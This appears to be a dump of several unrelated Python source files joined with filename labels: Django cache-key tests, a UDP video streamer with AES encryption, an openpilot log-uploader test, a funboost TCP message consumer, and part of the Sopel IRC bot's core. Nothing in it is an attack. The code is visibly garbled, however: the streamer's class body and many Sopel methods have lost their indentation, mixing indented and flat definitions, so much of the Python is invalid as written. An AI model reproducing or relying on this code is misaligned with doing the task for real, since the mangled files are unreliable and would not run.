        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        request = self.factory.get(self.path, {'test': 1})
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # The querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
        )

    @override_settings(USE_ETAGS=False)
    def test_without_etag(self):
        # With USE_ETAGS off, no ETag appears even after rendering.
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertFalse(response.has_header('ETag'))

    @ignore_warnings(category=RemovedInDjango21Warning)
    @override_settings(USE_ETAGS=True)
    def test_with_etag(self):
        # The ETag is only computed once the template has been rendered
        # (the content must be complete before it can be hashed).
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
    """Known-answer tests for make_template_fragment_key()."""

    def test_without_vary_on(self):
        expected = 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e'
        self.assertEqual(make_template_fragment_key('a.fragment'), expected)

    def test_with_one_vary_on(self):
        expected = 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72'
        self.assertEqual(make_template_fragment_key('foo', ['abc']), expected)

    def test_with_many_vary_on(self):
        expected = 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88'
        self.assertEqual(make_template_fragment_key('bar', ['abc', 'def']), expected)

    def test_proper_escaping(self):
        # Special characters in vary_on values must be escaped into the hash.
        expected = 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469'
        self.assertEqual(make_template_fragment_key('spam', ['abc:def%']), expected)
class CacheHandlerTest(SimpleTestCase):
    """The `caches` handler must cache instances per alias, per thread."""

    def test_same_instance(self):
        """
        Attempting to retrieve the same alias should yield the same instance.
        """
        first = caches['default']
        second = caches['default']
        self.assertIs(first, second)

    def test_per_thread(self):
        """
        Requesting the same alias from separate threads should yield separate
        instances.
        """
        seen = []

        def collect():
            seen.append(caches['default'])

        for _ in range(2):
            worker = threading.Thread(target=collect)
            worker.start()
            worker.join()
        self.assertIsNot(seen[0], seen[1])
|
Streamer.py | import socket
import threading
import time
import os
import AES
DNS_IP = '192.168.1.11'
DNS_PORT = 10000
VIEWER_PORT = 9000
CIPHER_MODE = 1
BUFFER_PATH = os.path.join(os.getcwd(),"buffer/")
class Streamer(object):
def __init__(self, name):
# viewer list
self.viewers_list = []
# Viewers server
self.viewSock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
self.viewSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.stream_name = name
# Hide Stream
self.isHide = False
self.key = []
def listen_viewers(self):
listen_addr = ("", VIEWER_PORT)
print listen_addr
self.viewSock.bind(listen_addr)
while True:
data, addr = self.viewSock.recvfrom(1024)
# just viewers with the key can watch this stream
if self.isHide:
data = AES.decryptData(self.key, data, CIPHER_MODE)
if data == "Novo Viewer":
print "Novo Viewer: ", addr
self.viewers_list.append(addr)
#avisa o dns que o streamer esta ativo
def send_dns(self, name):
# DNS client socket
DNSSock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
dns_addr = (DNS_IP, DNS_PORT)
print "Conectou no DNS"
DNSSock.sendto("stream:"+name, dns_addr)
DNSSock.close()
# Create Private Stream
def hide(self, key = []):
if not key:
fkey = open(self.stream_name+".key","w")
else:
fkey = open(self.stream_name+".key","r")
if not key:
key = AES.generateRandomKey(16)
fkey.write(key)
self.key = key
self.isHide = True
def send_video(self, video):
i=1;
for viewer in self.viewers_list:
print 'Transmitindo para: ', viewer,time.ctime()
i+=1
time.sleep(1)
self.viewSock.sendto(video, viewer)
def send(self, data):
if self.isHide:
data = AES.encryptData(self.key, data, CIPHER_MODE)
thread_transmit = threading.Thread(target=self.send_video, args=(data, ))
thread_transmit.start()
def start(self):
print 'Stream online ', self.stream_name
# Diz que esta online para o DNS
self.send_dns(self.stream_name )
# Esperar viewers
thread_listen = threading.Thread(target=self.listen_viewers)
thread_listen.start()
if __name__ == "__main__":
    import re

    def natural_keys(path):
        # Natural sort key so frame2.png orders before frame10.png.
        # BUG FIXED: natural_keys was referenced but never defined (NameError).
        return [int(tok) if tok.isdigit() else tok for tok in re.split(r'(\d+)', path)]

    os.system('clear')
    minhaStream = Streamer(raw_input("Nome da Stream: "))
    opt = raw_input("Private? y/n ")
    if opt == 'y':
        opt = raw_input("Ja tem uma key? KeyPath / n ")
        if opt != 'n':
            fk = open(opt, 'r')
            minhaStream.hide(fk.read())
            fk.close()  # BUG FIXED: key file handle was leaked.
        else:
            minhaStream.hide()
    minhaStream.start()
    # Stream loop
    while True:
        # Collect the PNG frames currently sitting in the buffer directory.
        # BUG FIXED: the original referenced `self.buffer` at module scope
        # (NameError: there is no `self` here).
        frame_buffer = []
        for each in os.listdir(BUFFER_PATH):
            sel_file = os.path.join(BUFFER_PATH, each)
            if os.path.isfile(sel_file) and sel_file.endswith('png'):
                frame_buffer.append(sel_file)
        frame_buffer.sort(key=natural_keys)
        # Stream each frame in chunks.
        for frame_path in frame_buffer:
            # BUG FIXED: the original did open("buffer/" + self.buffer, 'r'),
            # concatenating a string with the whole list (TypeError) instead
            # of opening the current frame; also open binary data as binary.
            img = open(frame_path, 'rb')
            while True:
                st = img.readline(1024)
                if not st:
                    break
                minhaStream.send(st)
            img.close()
        # End-of-sequence flag.
        minhaStream.send('EOQ')
|
test_uploader.py | #!/usr/bin/env python3
import os
import time
import threading
import unittest
import logging
import json
from selfdrive.swaglog import cloudlog
import selfdrive.loggerd.uploader as uploader
from common.xattr import getxattr
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
class TestLogHandler(logging.Handler):
    """Logging handler that records uploader events for test inspection.

    Captures the "key" of every JSON-formatted "upload_success" and
    "upload_ignored" log record; all other records are silently ignored.
    """

    def __init__(self):
        logging.Handler.__init__(self)
        self.reset()

    def reset(self):
        """Forget everything recorded so far."""
        self.upload_order = list()
        self.upload_ignored = list()

    def emit(self, record):
        try:
            payload = json.loads(record.getMessage())
            event = payload["event"]
            if event == "upload_success":
                self.upload_order.append(payload["key"])
            elif event == "upload_ignored":
                self.upload_ignored.append(payload["key"])
        except Exception:
            # Non-JSON or malformed records are not interesting to the tests.
            pass
# Single module-level handler attached to cloudlog once, so records emitted
# by the uploader thread during any test are captured here.
log_handler = TestLogHandler()
cloudlog.addHandler(log_handler)
class TestUploader(UploaderTestCase):
    """End-to-end tests of the uploader thread: upload ordering, ignore
    mode, and lock-file handling. Runs the real uploader_fn in a thread
    and inspects the events captured by log_handler."""

    def setUp(self):
        super().setUp()
        log_handler.reset()

    def start_thread(self):
        """Run the uploader loop in a daemon thread until end_event is set."""
        self.end_event = threading.Event()
        self.up_thread = threading.Thread(target=uploader.uploader_fn, args=[self.end_event])
        self.up_thread.daemon = True
        self.up_thread.start()

    def join_thread(self):
        self.end_event.set()
        self.up_thread.join()

    def gen_files(self, lock=False, boot=True):
        """Create one segment's worth of log/camera files (plus an optional
        boot log) and return their paths."""
        f_paths = list()
        for t in ["qlog.bz2", "rlog.bz2", "dcamera.hevc", "fcamera.hevc"]:
            f_paths.append(self.make_file_with_data(self.seg_dir, t, 1, lock=lock))
        if boot:
            f_paths.append(self.make_file_with_data("boot", f"{self.seg_dir}.bz2", 1, lock=lock))
        return f_paths

    def gen_order(self, seg1, seg2, boot=True):
        """Expected upload order for two routes: boot logs, then qlogs,
        then rlogs, then camera files, interleaving the routes per type."""
        keys = []
        if boot:
            keys += [f"boot/{self.seg_format.format(i)}.bz2" for i in seg1]
            keys += [f"boot/{self.seg_format2.format(i)}.bz2" for i in seg2]
        keys += [f"{self.seg_format.format(i)}/qlog.bz2" for i in seg1]
        keys += [f"{self.seg_format2.format(i)}/qlog.bz2" for i in seg2]
        keys += [f"{self.seg_format.format(i)}/rlog.bz2" for i in seg1]
        keys += [f"{self.seg_format2.format(i)}/rlog.bz2" for i in seg2]
        for i in seg1:
            keys += [f"{self.seg_format.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
        for i in seg2:
            keys += [f"{self.seg_format2.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
        return keys

    def test_upload(self):
        self.gen_files(lock=False)
        self.start_thread()
        # allow enough time that files could upload twice if there is a bug in the logic
        time.sleep(5)
        self.join_thread()
        exp_order = self.gen_order([self.seg_num], [])
        self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
        self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
        self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
        # Each uploaded file must have been marked with the upload xattr.
        for f_path in exp_order:
            self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
        self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")

    def test_upload_ignored(self):
        self.set_ignore()
        self.gen_files(lock=False)
        self.start_thread()
        # allow enough time that files could upload twice if there is a bug in the logic
        time.sleep(5)
        self.join_thread()
        exp_order = self.gen_order([self.seg_num], [])
        self.assertTrue(len(log_handler.upload_order) == 0, "Some files were not ignored")
        self.assertFalse(len(log_handler.upload_ignored) < len(exp_order), "Some files failed to ignore")
        self.assertFalse(len(log_handler.upload_ignored) > len(exp_order), "Some files were ignored twice")
        # Ignored files are still marked with the xattr so they aren't retried.
        for f_path in exp_order:
            self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not ignored")
        self.assertTrue(log_handler.upload_ignored == exp_order, "Files ignored in wrong order")

    def test_upload_files_in_create_order(self):
        # Two interleaved routes: order must follow creation order per type.
        seg1_nums = [0, 1, 2, 10, 20]
        for i in seg1_nums:
            self.seg_dir = self.seg_format.format(i)
            self.gen_files(boot=False)
        seg2_nums = [5, 50, 51]
        for i in seg2_nums:
            self.seg_dir = self.seg_format2.format(i)
            self.gen_files(boot=False)
        exp_order = self.gen_order(seg1_nums, seg2_nums, boot=False)
        self.start_thread()
        # allow enough time that files could upload twice if there is a bug in the logic
        time.sleep(5)
        self.join_thread()
        self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
        self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
        self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
        for f_path in exp_order:
            self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
        self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")

    def test_no_upload_with_lock_file(self):
        f_paths = self.gen_files(lock=True, boot=False)
        self.start_thread()
        # allow enough time that files should have been uploaded if they would be uploaded
        time.sleep(5)
        self.join_thread()
        # Locked files must never receive the upload xattr.
        for f_path in f_paths:
            self.assertFalse(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "File upload when locked")
if __name__ == "__main__":
    # Stop at the first failure: later tests would only add noise.
    unittest.main(failfast=True)
|
tcp_consumer.py | # -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 13:32
import json
from threading import Thread
import socket
from funboost.consumers.base_consumer import AbstractConsumer
class TCPConsumer(AbstractConsumer, ):
    """
    Message queue implemented over a raw TCP socket. Not persistent, but
    requires no extra broker software to be installed.
    """
    BROKER_KIND = 22
    BUFSIZE = 10240

    # noinspection PyAttributeOutsideInit
    def custom_init(self):
        # queue_name must look like "<ip>:<port>", e.g. "127.0.0.1:5689".
        ip__port_str = self.queue_name.split(':')
        ip_port = (ip__port_str[0], int(ip__port_str[1]))
        self._ip_port_raw = ip_port
        # Bind on all interfaces; keep the configured address for log output.
        self._ip_port = ('', ip_port[1])

    # noinspection DuplicatedCode
    def _shedual_task(self):
        """Accept TCP connections forever; one handler thread per client."""
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # TCP
        # Allow quick restarts without waiting for TIME_WAIT to expire.
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(self._ip_port)
        server.listen(128)
        self._server = server
        while True:
            tcp_cli_sock, addr = self._server.accept()
            # Multithreaded server: handles many long-lived clients at once.
            Thread(target=self.__handle_conn, args=(tcp_cli_sock,)).start()

    def __handle_conn(self, tcp_cli_sock):
        """Read messages from one client until it disconnects."""
        try:
            while True:
                data = tcp_cli_sock.recv(self.BUFSIZE)
                if not data:
                    break
                # BUG FIXED: the log label previously said "udp" even though
                # this is the TCP consumer.
                self._print_message_get_from_broker(f'tcp {self._ip_port_raw}', data.decode())
                # Ack string kept verbatim (typo and all): clients may match it.
                tcp_cli_sock.send('has_recived'.encode())
                # NOTE(review): assumes each recv() yields exactly one complete
                # JSON message; messages larger than BUFSIZE or coalesced sends
                # would break json.loads — confirm the producer's framing.
                kw = {'body': json.loads(data)}
                self._submit_task(kw)
            tcp_cli_sock.close()
        except ConnectionResetError:
            pass

    def _confirm_consume(self, kw):
        pass  # This broker has no consume-acknowledgement support.

    def _requeue(self, kw):
        pass
|
bot.py | # coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
    # Python 3: alias the Python 2 type names used throughout this module.
    unicode = str
    basestring = str
    py3 = True
else:
    py3 = False
class _CapReq(object):
    """Record of one IRCv3 capability request made by a module: the
    capability prefix, the requesting module, an optional argument, and
    success/failure callbacks (defaulting to no-ops)."""

    def __init__(self, prefix, module, failure=None, arg=None, success=None):
        # TODO at some point, reorder those args to be sane
        def _ignore(bot, cap):
            """Default no-op callback."""
            pass

        self.prefix = prefix
        self.module = module
        self.arg = arg
        # Substitute the no-op when a callback wasn't supplied.
        self.failure = failure if failure else _ignore
        self.success = success if success else _ignore
class Sopel(irc.Bot):
    def __init__(self, config, daemon=False):
        """Initialise the bot from *config* and load all enabled modules.

        :param config: a :class:`sopel.config.Config` instance
        :param daemon: run without an interactive console (used for iPython)
        """
        irc.Bot.__init__(self, config)
        self._daemon = daemon  # Used for iPython. TODO something saner here
        # `re.compile('.*') is re.compile('.*')` because of caching, so we need
        # to associate a list with each regex, since they are unexpectedly
        # indistinct.
        self._callables = {
            'high': collections.defaultdict(list),
            'medium': collections.defaultdict(list),
            'low': collections.defaultdict(list)
        }
        self.config = config
        """The :class:`sopel.config.Config` for the current Sopel instance."""
        self.doc = {}
        """
        A dictionary of command names to their docstring and example, if
        declared. The first item in a callable's commands list is used as the
        key in version *3.2* onward. Prior to *3.2*, the name of the function
        as declared in the source code was used.
        """
        self._command_groups = collections.defaultdict(list)
        """A mapping of module names to a list of commands in it."""
        self.stats = {}  # deprecated, remove in 7.0
        self._times = {}
        """
        A dictionary mapping lower-case'd nicks to dictionaries which map
        function names to the time which they were last used by that nick.
        """
        self.server_capabilities = {}
        """A dict mapping supported IRCv3 capabilities to their options.

        For example, if the server specifies the capability ``sasl=EXTERNAL``,
        it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
        without any options will have ``None`` as the value.

        For servers that do not support IRCv3, this will be an empty set."""
        self.enabled_capabilities = set()
        """A set containing the IRCv3 capabilities that the bot has enabled."""
        self._cap_reqs = dict()
        """A dictionary of capability names to a list of requests"""
        self.privileges = dict()
        """A dictionary of channels to their users and privilege levels

        The value associated with each channel is a dictionary of
        :class:`sopel.tools.Identifier`\\s to
        a bitwise integer value, determined by combining the appropriate
        constants from :mod:`sopel.module`.

        .. deprecated:: 6.2.0
            Use :attr:`channels` instead.
        """
        self.channels = tools.SopelMemory()  # name to chan obj
        """A map of the channels that Sopel is in.

        The keys are Identifiers of the channel names, and map to
        :class:`sopel.tools.target.Channel` objects which contain the users in
        the channel and their permissions.
        """
        self.users = tools.SopelMemory()  # name to user obj
        """A map of the users that Sopel is aware of.

        The keys are Identifiers of the nicknames, and map to
        :class:`sopel.tools.target.User` instances. In order for Sopel to be
        aware of a user, it must be in at least one channel which they are also
        in.
        """
        self.db = SopelDB(config)
        """The bot's database, as a :class:`sopel.db.SopelDB` instance."""
        self.memory = tools.SopelMemory()
        """
        A thread-safe dict for storage of runtime data to be shared between
        modules. See :class:`sopel.tools.Sopel.SopelMemory`
        """
        self.shutdown_methods = []
        """List of methods to call on shutdown"""
        # Background scheduler for module jobs; started immediately.
        self.scheduler = sopel.tools.jobs.JobScheduler(self)
        self.scheduler.start()

        # Set up block lists
        # Default to empty
        if not self.config.core.nick_blocks:
            self.config.core.nick_blocks = []
        if not self.config.core.host_blocks:
            self.config.core.host_blocks = []
        # Load and register all enabled modules (see setup()).
        self.setup()
# Backwards-compatibility aliases to attributes made private in 6.2. Remove
# these in 7.0
times = property(lambda self: getattr(self, '_times'))
command_groups = property(lambda self: getattr(self, '_command_groups'))
    def write(self, args, text=None):  # Shim this in here for autodocs
        """Send a command to the server.

        ``args`` is an iterable of strings, which are joined by spaces.
        ``text`` is treated as though it were the final item in ``args``, but
        is preceded by a ``:``. This is a special case which means that
        ``text``, unlike the items in ``args`` may contain spaces (though this
        constraint is not checked by ``write``).

        In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
        and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
        ``PRIVMSG :Hello, world!`` to the server.

        Newlines and carriage returns ('\\n' and '\\r') are removed before
        sending. Additionally, if the message (after joining) is longer
        than 510 characters, any remaining characters will not be sent.
        """
        # Pure delegation to the transport layer; this shim exists only so the
        # docstring appears on the Sopel class for autodocs.
        irc.Bot.write(self, args, text=text)
    def setup(self):
        """Load, set up, and register every module enabled in the config.

        Failures are reported to stderr per module (with the raising file and
        line) and counted, but never abort startup of the remaining modules.
        """
        stderr("\nWelcome to Sopel. Loading modules...\n\n")
        modules = sopel.loader.enumerate_modules(self.config)

        error_count = 0
        success_count = 0
        for name in modules:
            path, type_ = modules[name]
            try:
                module, _ = sopel.loader.load_module(name, path, type_)
            except Exception as e:
                error_count = error_count + 1
                filename, lineno = tools.get_raising_file_and_line()
                rel_path = os.path.relpath(filename, os.path.dirname(__file__))
                raising_stmt = "%s:%d" % (rel_path, lineno)
                stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
            else:
                try:
                    # Give the module a chance to initialise itself before its
                    # callables are extracted and registered.
                    if hasattr(module, 'setup'):
                        module.setup(self)
                    relevant_parts = sopel.loader.clean_module(
                        module, self.config)
                except Exception as e:
                    error_count = error_count + 1
                    filename, lineno = tools.get_raising_file_and_line()
                    rel_path = os.path.relpath(
                        filename, os.path.dirname(__file__)
                    )
                    raising_stmt = "%s:%d" % (rel_path, lineno)
                    stderr("Error in %s setup procedure: %s (%s)"
                           % (name, e, raising_stmt))
                else:
                    self.register(*relevant_parts)
                    success_count += 1

        if len(modules) > 1:  # coretasks is counted
            # Subtract one so the always-loaded coretasks module isn't counted
            # as a user-visible module.
            stderr('\n\nRegistered %d modules,' % (success_count - 1))
            stderr('%d modules failed to load\n\n' % error_count)
        else:
            stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
if not callable(obj):
return
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
if hasattr(obj, 'interval'):
# TODO this should somehow find the right job to remove, rather than
# clearing the entire queue. Issue #831
self.scheduler.clear_jobs()
if (getattr(obj, '__name__', None) == 'shutdown' and
obj in self.shutdown_methods):
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
# Append module's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
for callbl in callables:
if hasattr(callbl, 'rule'):
for rule in callbl.rule:
self._callables[callbl.priority][rule].append(callbl)
else:
self._callables[callbl.priority][re.compile('.*')].append(callbl)
if hasattr(callbl, 'commands'):
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self._command_groups[category].append(callbl.commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
for func in urls:
self.register_url_callback(func.url_regex, func)
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def msg(self, recipient, text, max_messages=1):
# Deprecated, but way too much of a pain to remove.
self.say(text, recipient, max_messages)
    def say(self, text, recipient, max_messages=1):
        """Send ``text`` as a PRIVMSG to ``recipient``.

        In the context of a triggered callable, the ``recipient`` defaults to
        the channel (or nickname, if a private message) from which the message
        was received.

        By default, this will attempt to send the entire ``text`` in one
        message. If the text is too long for the server, it may be truncated.
        If ``max_messages`` is given, the ``text`` will be split into at most
        that many messages, each no more than 400 bytes. The split is made at
        the last space character before the 400th byte, or at the 400th byte if
        no such space exists. If the ``text`` is too long to fit into the
        specified number of messages using the above splitting, the final
        message will contain the entire remainder, which may be truncated by
        the server.
        """
        excess = ''
        if not isinstance(text, unicode):
            # Make sure we are dealing with unicode string
            text = text.decode('utf-8')

        if max_messages > 1:
            # Manage multi-line only when needed
            text, excess = tools.get_sendable_message(text)

        try:
            # self.sending serialises outgoing traffic across threads; the
            # finally-block below guarantees the lock is always released.
            self.sending.acquire()

            # No messages within the last 3 seconds? Go ahead!
            # Otherwise, wait so it's been at least 0.8 seconds + penalty
            recipient_id = Identifier(recipient)
            if recipient_id not in self.stack:
                self.stack[recipient_id] = []
            elif self.stack[recipient_id]:
                elapsed = time.time() - self.stack[recipient_id][-1][0]
                if elapsed < 3:
                    # Longer messages pay a proportionally longer wait.
                    penalty = float(max(0, len(text) - 40)) / 70
                    wait = 0.8 + penalty
                    if elapsed < wait:
                        time.sleep(wait - elapsed)

                # Loop detection
                messages = [m[1] for m in self.stack[recipient_id][-8:]]

                # If what we about to send repeated at least 5 times in the
                # last 2 minutes, replace with '...'
                if messages.count(text) >= 5 and elapsed < 120:
                    text = '...'
                    if messages.count('...') >= 3:
                        # If we said '...' 3 times, discard message
                        return

            self.write(('PRIVMSG', recipient), text)
            # Record what was sent (sanitised) so future calls can rate-limit
            # and loop-detect; only the last 10 entries are kept.
            self.stack[recipient_id].append((time.time(), self.safe(text)))
            self.stack[recipient_id] = self.stack[recipient_id][-10:]
        finally:
            self.sending.release()
        # Now that we've sent the first part, we need to send the rest. Doing
        # this recursively seems easier to me than iteratively
        if excess:
            self.msg(recipient, excess, max_messages - 1)
def notice(self, text, dest):
"""Send an IRC NOTICE to a user or a channel.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.write(('NOTICE', dest), text)
def action(self, text, dest):
"""Send ``text`` as a CTCP ACTION PRIVMSG to ``dest``.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.say('\001ACTION {}\001'.format(text), dest)
def reply(self, text, dest, reply_to, notice=False):
"""Prepend ``reply_to`` to ``text``, and send as a PRIVMSG to ``dest``.
If ``notice`` is ``True``, send a NOTICE rather than a PRIVMSG.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``reply_to`` will default to
the nickname of the user who triggered the call, and ``dest`` to the
channel (or nickname, if a private message), in which the trigger
happened.
"""
text = '%s: %s' % (reply_to, text)
if notice:
self.notice(text, dest)
else:
self.say(text, dest)
class SopelWrapper(object):
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
    def call(self, func, sopel, trigger):
        """Invoke one triggered callable, enforcing per-user, global, and
        per-channel rate limits, and record the invocation time afterwards.

        :param func: the module callable to run
        :param sopel: the (usually wrapped) bot passed to the callable
        :param trigger: the :class:`sopel.trigger.Trigger` that fired
        """
        nick = trigger.nick
        current_time = time.time()
        # Ensure a per-nick, per-bot, and (for channel messages) per-channel
        # timing dict exists before any rate check reads them.
        if nick not in self._times:
            self._times[nick] = dict()
        if self.nick not in self._times:
            self._times[self.nick] = dict()
        if not trigger.is_privmsg and trigger.sender not in self._times:
            self._times[trigger.sender] = dict()

        # Admins and unblockable callables bypass all rate limiting.
        if not trigger.admin and not func.unblockable:
            if func in self._times[nick]:
                usertimediff = current_time - self._times[nick][func]
                if func.rate > 0 and usertimediff < func.rate:
                    #self._times[nick][func] = current_time
                    LOGGER.info(
                        "%s prevented from using %s in %s due to user limit: %d < %d",
                        trigger.nick, func.__name__, trigger.sender, usertimediff,
                        func.rate
                    )
                    return

            if func in self._times[self.nick]:
                globaltimediff = current_time - self._times[self.nick][func]
                if func.global_rate > 0 and globaltimediff < func.global_rate:
                    #self._times[self.nick][func] = current_time
                    LOGGER.info(
                        "%s prevented from using %s in %s due to global limit: %d < %d",
                        trigger.nick, func.__name__, trigger.sender, globaltimediff,
                        func.global_rate
                    )
                    return

            if not trigger.is_privmsg and func in self._times[trigger.sender]:
                chantimediff = current_time - self._times[trigger.sender][func]
                if func.channel_rate > 0 and chantimediff < func.channel_rate:
                    #self._times[trigger.sender][func] = current_time
                    LOGGER.info(
                        "%s prevented from using %s in %s due to channel limit: %d < %d",
                        trigger.nick, func.__name__, trigger.sender, chantimediff,
                        func.channel_rate
                    )
                    return

        try:
            exit_code = func(sopel, trigger)
        except Exception:  # TODO: Be specific
            exit_code = None
            self.error(trigger)

        # A callable returning NOLIMIT opts out of updating the rate-limit
        # timestamps (so the user isn't penalised for e.g. bad arguments).
        if exit_code != NOLIMIT:
            self._times[nick][func] = current_time
            self._times[self.nick][func] = current_time
            if not trigger.is_privmsg:
                self._times[trigger.sender][func] = current_time
    def dispatch(self, pretrigger):
        """Route a parsed IRC event to every registered callable whose rule
        matches, honoring nick/host blocks, event filters, intents, and each
        callable's threading preference.

        :param pretrigger: the pre-parsed event (:class:`sopel.trigger.PreTrigger`-like)
        """
        args = pretrigger.args
        # `text` is the trailing parameter (message body), if any.
        event, args, text = pretrigger.event, args, args[-1] if args else ''
        # Compute block status once per event, only if any blocks are configured.
        if self.config.core.nick_blocks or self.config.core.host_blocks:
            nick_blocked = self._nick_blocked(pretrigger.nick)
            host_blocked = self._host_blocked(pretrigger.host)
        else:
            nick_blocked = host_blocked = None

        list_of_blocked_functions = []
        for priority in ('high', 'medium', 'low'):
            items = self._callables[priority].items()

            for regexp, funcs in items:
                match = regexp.match(text)
                if not match:
                    continue
                user_obj = self.users.get(pretrigger.nick)
                account = user_obj.account if user_obj else None
                trigger = Trigger(self.config, pretrigger, match, account)
                wrapper = self.SopelWrapper(self, trigger)

                for func in funcs:
                    if (not trigger.admin and
                            not func.unblockable and
                            (nick_blocked or host_blocked)):
                        function_name = "%s.%s" % (
                            func.__module__, func.__name__
                        )
                        list_of_blocked_functions.append(function_name)
                        continue

                    if event not in func.event:
                        continue
                    if hasattr(func, 'intents'):
                        if not trigger.tags.get('intent'):
                            continue
                        # NOTE: `match` is reused here as a boolean flag for
                        # the intent check; the regex match object is no
                        # longer needed at this point.
                        match = False
                        for intent in func.intents:
                            if intent.match(trigger.tags.get('intent')):
                                match = True
                        if not match:
                            continue
                    if func.thread:
                        # Run in a background thread when the callable asks for it.
                        targs = (func, wrapper, trigger)
                        t = threading.Thread(target=self.call, args=targs)
                        t.start()
                    else:
                        self.call(func, wrapper, trigger)

        if list_of_blocked_functions:
            if nick_blocked and host_blocked:
                block_type = 'both'
